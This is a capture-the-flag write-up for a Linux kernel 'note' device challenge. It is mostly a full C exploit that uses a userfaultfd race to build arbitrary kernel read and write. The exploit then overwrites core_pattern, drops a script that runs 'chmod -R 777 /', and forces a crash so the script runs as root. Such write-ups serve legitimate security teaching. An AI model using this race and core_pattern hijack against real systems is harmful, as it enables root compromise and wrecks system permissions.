Problem

Environment

  • kernel version: 5.1.9

Features

This challenge provides a `note` misc device with which we can save (0xffffff00), get (0xffffff02), and update (0xffffff01) data via its unlocked_ioctl handler. On save and update, the data is stored xor-encrypted.

The struct enc_data_t (the stored data) and struct request_t are as follows:

typedef struct request_t {
  uint64_t idx;
  uint64_t size;
  uint64_t data;
} request_t;

typedef struct enc_data_t {
  uint64_t xor_key;
  uint64_t size;
  uint64_t data_addr_minus_page_offset_base;
  char enc_data[0]; // Struct Hack; see https://www.geeksforgeeks.org/struct-hack/
} enc_data_t;

Vulnerability

Since the device uses unlocked_ioctl (so ioctls are not serialized by the old big-kernel-lock path) and takes no mutex of its own, concurrent ioctls can race, making a race-condition attack easy. Furthermore, in the given kernel environment, unprivileged userfaultfd is allowed.

Consider following sequence:

    sequenceDiagram
	    participant user
	    participant device
	    participant userfaultfd
	    
	    user->>device: store_data(idx <- 0)
	    note over device: [0x00] enc_data(key=?,len=0x10,data=0x18) @ idx=0
	    device->>userfaultfd: request: copy_from_user
	    userfaultfd->>device: request: reset
	    note over device: [0x00] NULL
	    userfaultfd->>device: request: store_data(idx <- 0)
	    note over device: [0x00] enc_data(key=?,len=0,data=0x18) @ idx=0
	    userfaultfd->>device: request: store_data(idx <- 1)
	    note over device: [0x00] enc_data(key=?,len=0,data=0x18) @ idx=0
	    note over device: [0x18] enc_data(key=?,len=0,data=0x30) @ idx=1
	    userfaultfd->>device: response: data of copy_from_user = {0x11111111, 0x22222222, 0x33333333}
	    note over device: [0x00] enc_data(key=?,len=0,data=0x18) @ idx=0
	    note over device: [0x18] enc_data(key=0x11111111,len=0x22222222,data=0x33333333) @ idx=1
	    user->>device: get_data(idx=1)

As seen above, we can control the xor_key, size, and data_addr_minus_page_offset_base fields of enc_data_t. From there we can leak, step by step: the xor_key (leak_xor_key), data_addr_minus_page_offset_base (leak_vuln_dev_minus_page_offset_base), the device (module) base (leak_vuln_dev_base), page_offset_base (vuln_dev_base - vuln_dev_base_minus_page_offset_base), and the kernel base (leak_kernel_base).

Since the device provides read and update features, we can build AAR & AAW primitives by applying them to a modified enc_data.

Exploit

#define _GNU_SOURCE
#include <fcntl.h>
#include <linux/userfaultfd.h>
#include <poll.h>
#include <pthread.h>
#include <sched.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/ioctl.h>
#include <sys/mman.h>
#include <sys/resource.h>
#include <sys/syscall.h>
#include <unistd.h>

#define VULN_DEV_NAME "note"
#define VULN_DEV_CMD_ADD 0xffffff00
#define VULN_DEV_CMD_UPDATE 0xffffff01
#define VULN_DEV_CMD_GET 0xffffff02
#define VULN_DEV_CMD_RESET 0xffffff03
#define VULN_DEV_BASE 0xffffffffc0000000
#define VULN_DEV_MISC_FILE_OPS_OFFSET (0xffffffffc0002060 - VULN_DEV_BASE)
#define VULN_DEV_MISC_FILE_OPS_UNLOCKED_IOCTL_IDX 10
#define VULN_DEV_MISC_FILE_OPS_FLUSH_IDX 14
#define VULN_DEV_OFFSET_TO_PTR_TO_KERNEL_BASE \
  (0xffffffffc00021f8 - VULN_DEV_BASE)

#define KERNEL_BASE 0xffffffff81000000
#define OFFSET_OF_KERNEL_ADDR_OBTAINED_BY_VULN_DEV \
  (0xffffffff810a8fa0 - KERNEL_BASE)
#define CORE_PATTERN_OFFSET (0xffffffff8210dbe0 - KERNEL_BASE)

// Prints msg and blocks until the user presses enter (debugging aid).
static void get_enter_to_continue(const char* msg) {
  printf("%s\n", msg);
  (void)getchar();
}
// Reports the failing call via perror and terminates the process.
// Keeps the original exit(-1) status (i.e. 255) for compatibility.
static void fatal(const char* msg) {
  perror(msg);
  exit(-1);
}

// Creates a userfaultfd, registers [addr, addr+len) for missing-page faults,
// and spawns a handler thread running `handler` with the uffd (cast through
// void*) as its argument.  The thread handle is never joined.
// Returns the uffd on success; exits via fatal() on any failure.
static int register_uffd(void* addr, size_t len, void* (*handler)(void*)) {
  struct uffdio_api uffdio_api;
  struct uffdio_register uffdio_register;
  pthread_t th;
  int uffd = syscall(__NR_userfaultfd, __O_CLOEXEC | O_NONBLOCK);
  if (uffd < 0) {
    fatal("syscall(__NR_userfaultfd)");
  }

  // Handshake: the API version must be negotiated before any other uffd ioctl.
  uffdio_api.api = UFFD_API;
  uffdio_api.features = 0;
  if (ioctl(uffd, UFFDIO_API, &uffdio_api) < 0) {
    fatal("ioctl(UFFDIO_API)");
  }

  uffdio_register.range.start = (uint64_t)addr;
  uffdio_register.range.len = len;
  uffdio_register.mode = UFFDIO_REGISTER_MODE_MISSING;
  if (ioctl(uffd, UFFDIO_REGISTER, &uffdio_register) < 0) {
    fatal("ioctl(UFFDIO_REGISTER)");
  }

  // pthread_create returns a positive error number on failure (never -1),
  // so the original `< 0` check could never detect an error.
  if (pthread_create(&th, NULL, handler, (void*)(uint64_t)uffd) != 0) {
    fatal("pthread_create");
  }

  return uffd;
}

// CPU mask pinning both main and the uffd handler threads to the same core,
// so the fault handler reliably interleaves with the racing ioctls.
cpu_set_t target_cpu;
static int vuln_dev_fd;  // fd of /dev/note, opened in main()
uint64_t vuln_dev_xor_key;  // leaked per-boot xor key of the device
uint64_t vuln_dev_base_minus_page_offset_base;  // leaked module base - physmap base
uint64_t vuln_dev_base;  // leaked module (device) base address

uint64_t page_offset_base;  // physmap base (KASLR-randomized)
uint64_t kernel_base;  // kernel text base (KASLR-randomized)

// Mirrors the ioctl request layout expected by the note device.
typedef struct request_t {
  uint64_t idx;
  uint64_t size;
  uint64_t data;
} request_t;

// Issues the ADD ioctl: store a new note of `size` bytes read from `data`.
// idx is always 0 (presumably unused by the add path — TODO confirm against
// the module).  `size` is widened from uint8_t to uint64_t to match
// request_t.size and avoid silent truncation; all existing callers pass
// values <= 0xff, so behavior is unchanged.
static int vuln_dev_add(uint64_t size, void* data) {
  request_t req = {
      .idx = 0,
      .size = size,
      .data = (uint64_t)data,
  };
  return ioctl(vuln_dev_fd, VULN_DEV_CMD_ADD, &req);
}
static int vuln_dev_update(uint64_t idx, void* buf) {
  request_t req = {
      .idx = idx,
      .size = 0,
      .data = (uint64_t)buf,
  };
  return ioctl(vuln_dev_fd, VULN_DEV_CMD_UPDATE, &req);
}
static int vuln_dev_get(uint64_t idx, void* buf) {
  request_t req = {
      .idx = idx,
      .size = 0,
      .data = (uint64_t)buf,
  };
  return ioctl(vuln_dev_fd, VULN_DEV_CMD_GET, &req);
}
// Issues the RESET ioctl: drop all stored notes.  The request is zeroed;
// whether the reset path reads it is not visible here.
// Fixed: `()` in C is an obsolescent no-prototype declarator — use `(void)`.
static int vuln_dev_reset(void) {
  request_t req = {
      .idx = 0,
      .size = 0,
      .data = 0,
  };
  return ioctl(vuln_dev_fd, VULN_DEV_CMD_RESET, &req);
}

// functions for leaking xor_key

// Number of xor-key bytes leaked so far; leak_xor_key() bumps it each round,
// and the handler below uses it as the size of the first re-added note.
int leaked_xor_key_bytes = 0;
// uffd handler for the xor-key leak.  Pinned to the same CPU as main so the
// device's copy_from_user stalls on our registered page while we race it.
static void* userfault_handler_for_leak_xor_key(void* args) {
  if (sched_setaffinity(0, sizeof(cpu_set_t), &target_cpu)) {
    fatal("sched_setaffinity");
  }

  int uffd = (int)(long)args;
  // Scratch page; its contents are copied into the faulting page below.
  char* page = (char*)mmap(NULL, 0x1000, PROT_READ | PROT_WRITE,
                           MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
  if (page == MAP_FAILED) {
    fatal("userfault_handler_for_leak_xor_key: mmap");
  }

  static struct uffd_msg msg;
  struct uffdio_copy copy;
  struct pollfd pollfd;

  pollfd.fd = uffd;
  pollfd.events = POLLIN;
  while (poll(&pollfd, 1, -1) > 0) {
    if (pollfd.revents & POLLERR || pollfd.revents & POLLHUP) {
      fatal("userfault_handler_for_leak_xor_key: poll");
    }

    if (read(uffd, &msg, sizeof(msg)) <= 0) {
      fatal("userfault_handler_for_leak_xor_key: read(uffd)");
    }
    if (msg.event != UFFD_EVENT_PAGEFAULT) {
      fatal(
          "userfault_handler_for_leak_xor_key: msg.event != "
          "UFFD_EVENT_PAGEFAULT");
    }

    // Race window: the faulting thread is stalled inside the device's
    // copy_from_user.  Drop all notes, then re-add two so the pending copy
    // lands over freshly re-allocated note storage; the first add's size
    // (leaked_xor_key_bytes) shifts the overlap by one byte per round.
    // NOTE(review): the exact overlap layout depends on device internals
    // not visible in this file.
    vuln_dev_reset();
    memset(page, 0, 0x100);
    vuln_dev_add(leaked_xor_key_bytes, page);
    vuln_dev_add(0xff, page);

    // Resolve the fault with zeroed data, resuming copy_from_user.
    copy.dst = (uint64_t)msg.arg.pagefault.address;
    copy.src = (uint64_t)page;
    copy.len = 0x1000;
    copy.mode = 0;
    copy.copy = 0;
    if (ioctl(uffd, UFFDIO_COPY, &copy) < 0) {
      fatal("userfault_handler: ioctl(UFFDIO_COPY)");
    }

    // Handle exactly one fault, then exit the thread.
    goto DONE_PAGE_FAULT;
  }

DONE_PAGE_FAULT:
  munmap(page, 0x1000);
  return NULL;
}

// Recovers the device's 64-bit xor key, one byte per iteration.
//
// Each round registers a fresh userfaultfd page and triggers the add/reset
// race (userfault_handler_for_leak_xor_key); the position of the first 'a'
// (0x61) byte remaining in get(1)'s output encodes one key byte.
// NOTE(review): the encoding relies on device internals not visible here.
//
// Fixed: the inner scan previously redeclared `i`, shadowing the outer loop
// variable used in the shift below (-Wshadow); also breaks on first hit
// instead of scanning the full buffer.
static uint64_t leak_xor_key() {
  char buf[0x100] = {
      0,
  };
  uint64_t tmp_xor_key = 0;

  for (int i = 0; i < 8; ++i) {
    void* uffd_page = mmap(NULL, 0x1000, PROT_READ | PROT_WRITE,
                           MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
    if (uffd_page == MAP_FAILED) {
      fatal("mmap");
    }
    register_uffd(uffd_page, 0x1000, userfault_handler_for_leak_xor_key);

    // Faults inside copy_from_user, opening the handler's race window.
    vuln_dev_add(0x10, uffd_page);

    memset(buf, 'a', sizeof(buf));
    vuln_dev_get(1, buf);
    int idx_61 = -1;
    for (int j = 0; j < 0x100; ++j) {
      if (buf[j] == 0x61) {
        idx_61 = j;
        break;
      }
    }
    if (idx_61 == -1) {
      fatal("leak_xor_key: idx_61 == -1");
    }

    tmp_xor_key |= ((uint64_t)idx_61) << (i * 8);

    vuln_dev_reset();
    munmap(uffd_page, 0x1000);
    ++leaked_xor_key_bytes;
  }

  return tmp_xor_key;
}

// functions for leaking vuln_dev_base - page_offset_base

// uffd handler for leaking (module data address - page_offset_base).
// While the faulting add stalls in copy_from_user, replace the note store
// with empty notes and feed back a forged note header: xor_key and size
// (0x18) are pre-xored with the leaked key so the device decrypts them to
// the intended values, and the device-written data_addr field is then
// readable via get(1).
// NOTE(review): field interpretation follows the writeup above; confirm
// against the module.
// Fixed: all fatal() diagnostics below previously named
// userfault_handler_for_leak_xor_key (copy-paste).
static void* userfault_handler_for_vuln_dev_base_minus_page_offset_base(
    void* args) {
  if (sched_setaffinity(0, sizeof(cpu_set_t), &target_cpu)) {
    fatal("sched_setaffinity");
  }

  int uffd = (int)(long)args;
  char* page = (char*)mmap(NULL, 0x1000, PROT_READ | PROT_WRITE,
                           MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
  if (page == MAP_FAILED) {
    fatal("userfault_handler_for_vuln_dev_base_minus_page_offset_base: mmap");
  }

  static struct uffd_msg msg;
  struct uffdio_copy copy;
  struct pollfd pollfd;

  pollfd.fd = uffd;
  pollfd.events = POLLIN;
  while (poll(&pollfd, 1, -1) > 0) {
    if (pollfd.revents & POLLERR || pollfd.revents & POLLHUP) {
      fatal("userfault_handler_for_vuln_dev_base_minus_page_offset_base: poll");
    }

    if (read(uffd, &msg, sizeof(msg)) <= 0) {
      fatal(
          "userfault_handler_for_vuln_dev_base_minus_page_offset_base: "
          "read(uffd)");
    }
    if (msg.event != UFFD_EVENT_PAGEFAULT) {
      fatal(
          "userfault_handler_for_vuln_dev_base_minus_page_offset_base: "
          "msg.event != UFFD_EVENT_PAGEFAULT");
    }

    // Race window: re-populate the store with zero-size notes, then forge
    // note metadata in the page the stalled copy_from_user will consume.
    vuln_dev_reset();
    memset(page, 0, 0x100);
    vuln_dev_add(0, page);
    vuln_dev_add(0, page);
    vuln_dev_add(0, page);

    // Pre-encrypt the forged xor_key and size so they decrypt correctly.
    *(uint64_t*)(page) = vuln_dev_xor_key;
    *(uint64_t*)(page + 8) = 0x18 ^ vuln_dev_xor_key;

    copy.dst = (uint64_t)msg.arg.pagefault.address;
    copy.src = (uint64_t)page;
    copy.len = 0x1000;
    copy.mode = 0;
    copy.copy = 0;
    if (ioctl(uffd, UFFDIO_COPY, &copy) < 0) {
      fatal(
          "userfault_handler_for_vuln_dev_base_minus_page_offset_base: "
          "ioctl(UFFDIO_COPY)");
    }

    // Handle exactly one fault, then exit the thread.
    goto DONE_PAGE_FAULT;
  }

DONE_PAGE_FAULT:
  munmap(page, 0x1000);
  return NULL;
}

// Leaks (module data area address - page_offset_base).  Triggers the race via
// userfault_handler_for_vuln_dev_base_minus_page_offset_base, then reads the
// note back: offset 0x10 of the output holds the device-written
// data_addr_minus_page_offset_base field.
// NOTE(review): 0x2568 is presumably the offset of the note storage within
// the module's data area — TODO confirm against the module binary.
static uint64_t leak_vuln_dev_minus_page_offset_base() {
  char buf[0x100] = {
      0,
  };

  void* uffd_page = mmap(NULL, 0x1000, PROT_READ | PROT_WRITE,
                         MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
  if (uffd_page == MAP_FAILED) {
    fatal("mmap");
  }
  register_uffd(uffd_page, 0x1000,
                userfault_handler_for_vuln_dev_base_minus_page_offset_base);

  vuln_dev_reset();
  // Faults inside copy_from_user; the handler forges the note header.
  vuln_dev_add(0x10, uffd_page);
  vuln_dev_get(1, buf);
  vuln_dev_reset();

  munmap(uffd_page, 0x1000);

  uint64_t vuln_dev_base_minus_page_offset_base = *(uint64_t*)(buf + 0x10);
  return vuln_dev_base_minus_page_offset_base - 0x2568;
}

// functions for leaking vuln_dev_base

// uffd handler for leaking the module base.  Forges note 1's header so its
// data pointer targets the module's misc file_operations flush slot
// (address expressed relative to page_offset_base); the subsequent get(1)
// then returns memory from which the module base is derived.
// NOTE(review): exact meaning of the value read back depends on the module's
// data layout — confirm against the module binary.
// Fixed: all fatal() diagnostics below previously named
// userfault_handler_for_leak_xor_key (copy-paste).
static void* userfault_handler_for_vuln_dev_base(void* args) {
  if (sched_setaffinity(0, sizeof(cpu_set_t), &target_cpu)) {
    fatal("sched_setaffinity");
  }

  int uffd = (int)(long)args;
  char* page = (char*)mmap(NULL, 0x1000, PROT_READ | PROT_WRITE,
                           MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
  if (page == MAP_FAILED) {
    fatal("userfault_handler_for_vuln_dev_base: mmap");
  }

  static struct uffd_msg msg;
  struct uffdio_copy copy;
  struct pollfd pollfd;

  pollfd.fd = uffd;
  pollfd.events = POLLIN;
  while (poll(&pollfd, 1, -1) > 0) {
    if (pollfd.revents & POLLERR || pollfd.revents & POLLHUP) {
      fatal("userfault_handler_for_vuln_dev_base: poll");
    }

    if (read(uffd, &msg, sizeof(msg)) <= 0) {
      fatal("userfault_handler_for_vuln_dev_base: read(uffd)");
    }
    if (msg.event != UFFD_EVENT_PAGEFAULT) {
      fatal(
          "userfault_handler_for_vuln_dev_base: msg.event != "
          "UFFD_EVENT_PAGEFAULT");
    }

    // Race window: re-populate with empty notes, then forge note metadata.
    vuln_dev_reset();
    memset(page, 0, 0x100);
    vuln_dev_add(0, page);
    vuln_dev_add(0, page);

    // Forged header (pre-xored so device-side decryption yields the intended
    // values): size 0x18, data pointer = file_operations flush slot.
    *(uint64_t*)(page) = vuln_dev_xor_key;
    *(uint64_t*)(page + 0x08) = 0x18 ^ vuln_dev_xor_key;
    *(uint64_t*)(page + 0x10) =
        (vuln_dev_base_minus_page_offset_base + VULN_DEV_MISC_FILE_OPS_OFFSET +
         8 * VULN_DEV_MISC_FILE_OPS_FLUSH_IDX) ^
        vuln_dev_xor_key;

    copy.dst = (uint64_t)msg.arg.pagefault.address;
    copy.src = (uint64_t)page;
    copy.len = 0x1000;
    copy.mode = 0;
    copy.copy = 0;
    if (ioctl(uffd, UFFDIO_COPY, &copy) < 0) {
      fatal("userfault_handler_for_vuln_dev_base: ioctl(UFFDIO_COPY)");
    }

    // Handle exactly one fault, then exit the thread.
    goto DONE_PAGE_FAULT;
  }

DONE_PAGE_FAULT:
  munmap(page, 0x1000);
  return NULL;
}

// Leaks the module (device) base address via the race set up by
// userfault_handler_for_vuln_dev_base: the forged note points at the
// module's file_operations flush slot, and the first qword read back is
// taken as the module base.
// NOTE(review): why that slot holds (or leads to) the module base is not
// visible here — confirm against the module binary.
static uint64_t leak_vuln_dev_base() {
  char buf[0x100] = {
      0,
  };

  void* uffd_page = mmap(NULL, 0x1000, PROT_READ | PROT_WRITE,
                         MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
  if (uffd_page == MAP_FAILED) {
    fatal("mmap");
  }
  register_uffd(uffd_page, 0x1000, userfault_handler_for_vuln_dev_base);

  vuln_dev_reset();
  // Faults inside copy_from_user; the handler forges the note header.
  vuln_dev_add(0x18, uffd_page);
  vuln_dev_get(1, buf);
  vuln_dev_reset();

  munmap(uffd_page, 0x1000);

  uint64_t tmp_vuln_dev_base = *(uint64_t*)(buf);
  return tmp_vuln_dev_base;
}

// functions for aar

// Target address and byte count for the next aar() call; consumed by the
// handler below.
uint64_t aar_addr;
size_t aar_size;
// uffd handler backing the arbitrary-address-read primitive: forges note 1's
// header so its data pointer is (aar_addr - page_offset_base) and its size
// is aar_size; the following get(1) then returns aar_size bytes from
// aar_addr.
// Fixed: all fatal() diagnostics below previously named
// userfault_handler_for_leak_xor_key (copy-paste).
static void* userfault_handler_for_aar(void* args) {
  if (sched_setaffinity(0, sizeof(cpu_set_t), &target_cpu)) {
    fatal("sched_setaffinity");
  }

  int uffd = (int)(long)args;
  char* page = (char*)mmap(NULL, 0x1000, PROT_READ | PROT_WRITE,
                           MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
  if (page == MAP_FAILED) {
    fatal("userfault_handler_for_aar: mmap");
  }

  static struct uffd_msg msg;
  struct uffdio_copy copy;
  struct pollfd pollfd;

  pollfd.fd = uffd;
  pollfd.events = POLLIN;
  while (poll(&pollfd, 1, -1) > 0) {
    if (pollfd.revents & POLLERR || pollfd.revents & POLLHUP) {
      fatal("userfault_handler_for_aar: poll");
    }

    if (read(uffd, &msg, sizeof(msg)) <= 0) {
      fatal("userfault_handler_for_aar: read(uffd)");
    }
    if (msg.event != UFFD_EVENT_PAGEFAULT) {
      fatal(
          "userfault_handler_for_aar: msg.event != "
          "UFFD_EVENT_PAGEFAULT");
    }

    // Race window: re-populate with empty notes, then forge note metadata.
    vuln_dev_reset();
    memset(page, 0, 0x100);
    vuln_dev_add(0, page);
    vuln_dev_add(0, page);

    // Forged header (pre-xored so device-side decryption yields the intended
    // values): size aar_size, data pointer = aar_addr via physmap offset.
    *(uint64_t*)(page) = vuln_dev_xor_key;
    *(uint64_t*)(page + 0x08) = aar_size ^ vuln_dev_xor_key;
    *(uint64_t*)(page + 0x10) =
        (aar_addr - page_offset_base) ^ vuln_dev_xor_key;

    copy.dst = (uint64_t)msg.arg.pagefault.address;
    copy.src = (uint64_t)page;
    copy.len = 0x1000;
    copy.mode = 0;
    copy.copy = 0;
    if (ioctl(uffd, UFFDIO_COPY, &copy) < 0) {
      fatal("userfault_handler_for_aar: ioctl(UFFDIO_COPY)");
    }

    // Handle exactly one fault, then exit the thread.
    goto DONE_PAGE_FAULT;
  }

DONE_PAGE_FAULT:
  munmap(page, 0x1000);
  return NULL;
}

// Arbitrary-address read: copies `size` bytes from kernel address `addr`
// into `out` via the add/get race (userfault_handler_for_aar forges the
// note header).  size must be < 0x100 — presumably bounded by the callers'
// buffer sizes; TODO confirm the device-side limit.
// NOTE(review): the uffd and handler thread created by register_uffd() are
// never reclaimed — each call leaks one fd and one thread.
static void aar(void* out, uint64_t addr, uint64_t size) {
  if (size >= 0x100) {
    fatal("aar: size >= 0x100");
  }

  void* uffd_page = mmap(NULL, 0x1000, PROT_READ | PROT_WRITE,
                         MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
  if (uffd_page == MAP_FAILED) {
    fatal("mmap");
  }
  register_uffd(uffd_page, 0x1000, userfault_handler_for_aar);

  // Parameters for the handler (globals, since the handler gets only uffd).
  aar_addr = addr;
  aar_size = size;

  vuln_dev_reset();
  // Faults inside copy_from_user; the handler forges the note header.
  vuln_dev_add(0x18, uffd_page);
  vuln_dev_get(1, out);
  vuln_dev_reset();

  munmap(uffd_page, 0x1000);
}

// functions for aaw

// Target address and byte count for the next aaw() call; consumed by the
// handler below.
uint64_t aaw_addr;
size_t aaw_size;
// uffd handler backing the arbitrary-address-write primitive: forges note
// 1's header so its data pointer is (aaw_addr - page_offset_base) and its
// size is aaw_size; the following update(1) then writes aaw_size bytes to
// aaw_addr.
// Fixed: all fatal() diagnostics below previously named
// userfault_handler_for_leak_xor_key (copy-paste).
static void* userfault_handler_for_aaw(void* args) {
  if (sched_setaffinity(0, sizeof(cpu_set_t), &target_cpu)) {
    fatal("sched_setaffinity");
  }

  int uffd = (int)(long)args;
  char* page = (char*)mmap(NULL, 0x1000, PROT_READ | PROT_WRITE,
                           MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
  if (page == MAP_FAILED) {
    fatal("userfault_handler_for_aaw: mmap");
  }

  static struct uffd_msg msg;
  struct uffdio_copy copy;
  struct pollfd pollfd;

  pollfd.fd = uffd;
  pollfd.events = POLLIN;
  while (poll(&pollfd, 1, -1) > 0) {
    if (pollfd.revents & POLLERR || pollfd.revents & POLLHUP) {
      fatal("userfault_handler_for_aaw: poll");
    }

    if (read(uffd, &msg, sizeof(msg)) <= 0) {
      fatal("userfault_handler_for_aaw: read(uffd)");
    }
    if (msg.event != UFFD_EVENT_PAGEFAULT) {
      fatal(
          "userfault_handler_for_aaw: msg.event != "
          "UFFD_EVENT_PAGEFAULT");
    }

    // Race window: re-populate with empty notes, then forge note metadata.
    vuln_dev_reset();
    memset(page, 0, 0x100);
    vuln_dev_add(0, page);
    vuln_dev_add(0, page);

    // Forged header (pre-xored so device-side decryption yields the intended
    // values): size aaw_size, data pointer = aaw_addr via physmap offset.
    *(uint64_t*)(page) = vuln_dev_xor_key;
    *(uint64_t*)(page + 0x08) = aaw_size ^ vuln_dev_xor_key;
    *(uint64_t*)(page + 0x10) =
        (aaw_addr - page_offset_base) ^ vuln_dev_xor_key;

    copy.dst = (uint64_t)msg.arg.pagefault.address;
    copy.src = (uint64_t)page;
    copy.len = 0x1000;
    copy.mode = 0;
    copy.copy = 0;
    if (ioctl(uffd, UFFDIO_COPY, &copy) < 0) {
      fatal("userfault_handler_for_aaw: ioctl(UFFDIO_COPY)");
    }

    // Handle exactly one fault, then exit the thread.
    goto DONE_PAGE_FAULT;
  }

DONE_PAGE_FAULT:
  munmap(page, 0x1000);
  return NULL;
}

// Arbitrary-address write: writes `size` bytes from `data` to kernel address
// `addr` via the add/update race (userfault_handler_for_aaw forges the note
// header).  size must be < 0x100.
// NOTE(review): like aar(), each call leaks the uffd and handler thread
// created by register_uffd().
static void aaw(uint64_t addr, void* data, uint64_t size) {
  if (size >= 0x100) {
    // fixed: diagnostic previously said "aar" (copy-paste).
    fatal("aaw: size >= 0x100");
  }

  void* uffd_page = mmap(NULL, 0x1000, PROT_READ | PROT_WRITE,
                         MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
  if (uffd_page == MAP_FAILED) {
    fatal("mmap");
  }
  register_uffd(uffd_page, 0x1000, userfault_handler_for_aaw);

  // Parameters for the handler (globals, since the handler gets only uffd).
  aaw_addr = addr;
  aaw_size = size;

  vuln_dev_reset();
  // Faults inside copy_from_user; the handler forges the note header.
  vuln_dev_add(0x18, uffd_page);
  vuln_dev_update(1, data);
  vuln_dev_reset();

  munmap(uffd_page, 0x1000);
}

// Derives the kernel text base: read a module-resident qword (at
// VULN_DEV_OFFSET_TO_PTR_TO_KERNEL_BASE from the module base) that points
// into the kernel, dereference that pointer once more, then subtract the
// known offset of the obtained kernel address.
static uint64_t leak_kernel_base() {
  uint64_t val;
  aar(&val, vuln_dev_base + VULN_DEV_OFFSET_TO_PTR_TO_KERNEL_BASE, 8);
  aar(&val, val, 8);
  return val - OFFSET_OF_KERNEL_ADDR_OBTAINED_BY_VULN_DEV;
}

// end of helper functions

// Overwrites the kernel's core_pattern with new_core_pattern (which must be
// NUL-terminated with strlen == len) using the AAW primitive, then reads
// /proc/sys/kernel/core_pattern back to verify.
// Returns 0 on success, -1 on failure.
static int overwrite_core_pattern(const char* new_core_pattern, size_t len) {
  // Write len + 1 bytes so the NUL terminator lands too; otherwise trailing
  // bytes of the old pattern could remain appended to the new command.
  aaw(kernel_base + CORE_PATTERN_OFFSET, (void*)new_core_pattern, len + 1);

  int fd = open("/proc/sys/kernel/core_pattern", O_RDONLY);
  if (fd < 0) {
    // fixed: fd was previously used without checking open()'s result.
    return -1;
  }
  char buf[0x100] = {
      0,
  };
  // fixed: read()'s result was previously ignored; also leave a NUL byte.
  ssize_t n = read(fd, buf, sizeof(buf) - 1);
  close(fd);
  if (n < 0) {
    return -1;
  }

  if (strncmp(buf, new_core_pattern, len) != 0) {
    return -1;
  }
  return 0;
}

int main() {
  // Pin to CPU 0 so the uffd handler threads (also pinned) interleave
  // deterministically with our racing ioctls.
  CPU_ZERO(&target_cpu);
  CPU_SET(0, &target_cpu);
  if (sched_setaffinity(0, sizeof(cpu_set_t), &target_cpu)) {
    fatal("sched_setaffinity");
  }

  vuln_dev_fd = open("/dev/" VULN_DEV_NAME, O_RDONLY);
  if (vuln_dev_fd < 0) {
    fatal("open(/dev/" VULN_DEV_NAME ")");
  }

  // Leak chain: xor key -> (module base - page_offset_base) -> module base
  // -> page_offset_base -> kernel base.
  vuln_dev_xor_key = leak_xor_key();
  printf("[+] xor_key: 0x%lx\n", vuln_dev_xor_key);
  vuln_dev_base_minus_page_offset_base = leak_vuln_dev_minus_page_offset_base();
  printf("[+] vuln_dev_base_minus_page_offset_base: 0x%lx\n",
         vuln_dev_base_minus_page_offset_base);
  vuln_dev_base = leak_vuln_dev_base();
  printf("[+] vuln_dev_base: 0x%lx\n", vuln_dev_base);

  page_offset_base = vuln_dev_base - vuln_dev_base_minus_page_offset_base;
  printf("[+] page_offset_base: 0x%lx\n", page_offset_base);
  kernel_base = leak_kernel_base();
  printf("[+] kernel_base: 0x%lx\n", kernel_base);

  // Redirect core dumps into a pipe helper we control (runs as root).
  puts("[*] prepare for core_pattern");
  const char* new_core_pattern = "|//home/note/evil.sh";
  const size_t new_core_pattern_len = strlen(new_core_pattern);
  printf("[*] overwriting core_pattern to \"%s\"...\n", new_core_pattern);
  if (overwrite_core_pattern(new_core_pattern, new_core_pattern_len) < 0) {
    fatal("overwrite_core_pattern");
  }
  puts("[*] make //home/note/evil.sh...");
  system("echo -e '#!/bin/sh\nchmod -R 777 /' > //home/note/evil.sh");
  system("chmod +x //home/note/evil.sh");

  // Raise this process's core-dump limit directly.  fixed: the original
  // system("ulimit -c unlimited") only changed the child shell's limit and
  // left our own RLIMIT_CORE untouched.
  struct rlimit rlim = {RLIM_INFINITY, RLIM_INFINITY};
  if (setrlimit(RLIMIT_CORE, &rlim) < 0) {
    fatal("setrlimit(RLIMIT_CORE)");
  }

  // Deliberate wild write: SIGSEGV -> core dump -> kernel invokes the piped
  // core_pattern helper (evil.sh) with root privileges.
  uint64_t* evil_ptr = (uint64_t*)0xdeadbeefcafebebe;
  *evil_ptr = 0xdeadbeefcafebebe;

  close(vuln_dev_fd);
  return 0;
}

Reference